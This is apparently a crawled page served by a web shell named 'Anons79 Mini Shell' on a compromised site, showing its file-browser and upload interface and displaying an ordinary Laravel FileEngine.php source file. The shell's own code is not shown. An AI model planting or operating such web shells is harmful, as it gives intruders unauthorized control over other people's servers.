Anons79 Mini Shell

Directory : /home/proudlyafrican/www/vendor/laravel/framework/src/Illuminate/View/Engines/
Upload File :
Current File : /home/proudlyafrican/www/vendor/laravel/framework/src/Illuminate/View/Engines/FileEngine.php

<?php

namespace Illuminate\View\Engines;

class FileEngine implements EngineInterface
{
    /**
     * Get the evaluated contents of the view.
     *
     * @param  string  $path
     * @param  array   $data
     * @return string
     */
    public function get($path, array $data = [])
    {
        return file_get_contents($path);
    }
}

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]